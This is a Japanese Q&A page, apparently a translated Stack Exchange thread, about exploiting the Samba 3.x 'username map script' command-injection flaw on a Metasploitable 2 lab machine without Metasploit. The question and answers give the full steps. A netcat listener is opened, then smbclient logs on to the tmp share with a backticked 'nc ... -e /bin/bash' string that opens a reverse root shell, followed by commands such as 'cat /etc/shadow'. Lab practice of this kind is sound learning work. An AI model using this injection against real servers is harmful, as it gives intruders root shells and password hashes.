web-dev-qa-db-ja.com

Metasploitなしのリバース接続Metasploitable 2-> Kali Linux(Samba 3.x)

私は学習を目的として、Metasploitを使用せずにMetasploitable 2を活用しようとしています。この場合、私はSamba 3.xに焦点を合わせています(ポートTCP 139、445)

このリンクでは http://www.rwbnetsec.com/samba-3-x/ nmapスキャンが明らかにした後にこのマシンを悪用する2つの異なる方法が説明されていますTCP= Sambaバージョン3.xを実行しているポート139および445が開いている。

2番目の方法は、

この脆弱性は、Sambaの「ユーザー名マップスクリプト」機能を利用します。ユーザー入力のフィルタリングは行われないため、攻撃者はSMBセッションに接続し、シェルメタキャラクターをユーザー名の入力として使用して、リモートシステムでコマンドを実行させる可能性があります。これにより、攻撃者がrootアクセス権を持つ犠牲マシンにリモートシェルを取得することを許可します。

Metasploitを使用すると私の問題が発生します。

私はついにこのビデオを見つけました https://www.youtube.com/watch?v=-Y8-fZAvq9c これはMetasploitを回避しますが、私にとっては機能しません(Kali = 192.168。 200.1; Metasploitable2 = 192.168.200.130):

  1. ターミナルウィンドウ1で、netcatが待機するように設定します。

    netcat -nlvp 4444

  2. ターミナルウィンドウ2で、共有を確認します

    smbclient -L //192.168.200.130

  3. Tmpフォルダーに注目し、接続します(ターミナル2)。

    smbclient //192.168.200.130/tmp

  4. 最後に、「smb:>」を取得します。「logon」コマンドを使用して、Kaliにリバース接続します。

    smb:>ログオン "/ = nc 192.168.200.1 4444 -e /bin/bash "

この最後のポイントは、「セッションのセットアップに失敗しました:NT_STATUS_NO_MEMORY」というエラーメッセージが表示されて機能しません。

「ログオン」コマンドを説明する良いマニュアルを見つけるのは難しいです。 netcatの使用方法を変更してみました。

ポイント1で、私は書きます

smb: \> nc -nlvp 4444 -e /bin/bash

ポイント4で、私は書きます

smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"

同じ結果。同じメッセージエラー。

本当に一人でやろうとしたけどできなかった。あなたが私を助けてくれるなら、私はとても感謝しています。

前もって感謝します!!

5
J.g.

リスナーをsmb(脆弱なボックス)に設定しているようです。

smb: \> nc -nlvp 4444 -e /bin/bash

あなたがしなければならないことは、攻撃ボックスにリスナーを設定することです。代わりに次のコマンドを使用します。

nc -nlvp 4444 

最後にmetasploitable2から次のコマンドを発行します。

logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"
4
user183410

同じ問題を抱えていた人のために、以前の回答とこのリンク Metasploitable 2-Samba に従って、私がどのように解決したかを回答します。

実行する手順は次のとおりです。

  1. ターミナルウィンドウ1を開き、netcatが待機するように設定します。

    netcat -nlvp 4444

  2. ターミナルウィンドウ2を開き、被害者の共有を確認します。

    smbclient -L //192.168.200.130

  3. (ターミナル2)tmpフォルダーに注目し、被害者に接続します。

    smbclient //192.168.200.130/tmp

  4. (ターミナル2)最後に、smb: >ここで、コマンドlogonは、Kaliへの逆接続に使用されます。

    smb:\> logon "/ =` nc 192.168.200.1 4444 -e/bin/bash` "

注意:バックティックを忘れないでください。

  1. (ターミナル1)確立された接続を確認し、目的のコマンドを挿入できます。例:

    • id
    • hostname
    • uname -a
    • cat /etc/shadow

パスワードが要求されたら、Enterをクリックします(空のままにします)。

0
J.g.